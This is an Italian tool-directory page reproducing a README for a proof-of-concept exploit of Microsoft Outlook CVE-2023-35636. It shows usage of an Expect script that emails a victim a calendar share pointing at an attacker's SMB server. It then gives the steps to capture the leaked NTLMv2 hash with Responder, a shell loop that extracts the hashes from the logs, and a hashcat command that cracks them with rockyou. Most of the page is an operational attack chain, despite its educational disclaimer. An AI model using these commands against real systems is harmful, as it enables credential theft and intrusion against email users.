Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-35636 — Vulnerabilità di divulgazione di informazioni di Microsoft Outlook (perdita di hash delle password) - Expect Script POC | Kitploit
Strumenti/GitHubGitHub/duy-31/cve-2023-35636
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitEsfiltrazione DatiApprendimento e FormazioneSicurezza Email
GitHubduy-31/cve-2023-35636

CVE-2023-35636

Vulnerabilità di divulgazione di informazioni di Microsoft Outlook (perdita di hash delle password) - Expect Script POC

Vedi Repository
43642 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-35636

Vulnerabilità di divulgazione di informazioni di Microsoft Outlook (perdita dell'hash della password) - Script POC Expect

CVE-2023-35636 è un exploit della funzione di condivisione del calendario in Microsoft Outlook, tramite l'aggiunta di due intestazioni a un'email che inducono Outlook a condividere contenuti e contattare una macchina designata, creando l'opportunità di intercettare un hash NTLM v2.

  • Esegui un responder con il server SMB attivo

image

  • Invia un'email e attendi (il firewall del destinatario dell'email deve consentire il traffico SMB (445))

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share

./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (non dimenticare tutti i \)

image

notes: chmod +x cve-2023-35636.sh

richiede l'app expect

richiede un IP mittente legittimo e un mittente email (per superare SPF, DKIM, DMARC)

  • Se l'utente destinatario fa clic sulla piccola icona del calendario .. BOOM l'IP/utente (testo chiaro) e l'hash della password (NTLM-v2-SSP) vengono inviati al tuo IP del responder

image

image

  • Puoi quindi provare a crackare la password con hashcat/john the ripper

for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'

do

echo "[*] search for: $user";

strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt

done

hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O


Crediti: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes

Soluzione alternativa/Correzione: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636


più su di me ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Avvertenza: IMPORTANTE: Questo script è fornito SOLO per scopi educativi, test etici e uso legale. Non utilizzarlo su alcun sistema o rete senza autorizzazione esplicita. L'accesso non autorizzato a sistemi informatici e reti è illegale e gli utenti sorpresi a svolgere attività non autorizzate sono soggetti ad azioni legali. L'autore NON è responsabile per eventuali danni causati dall'uso improprio di questo script.

Scarica lo strumento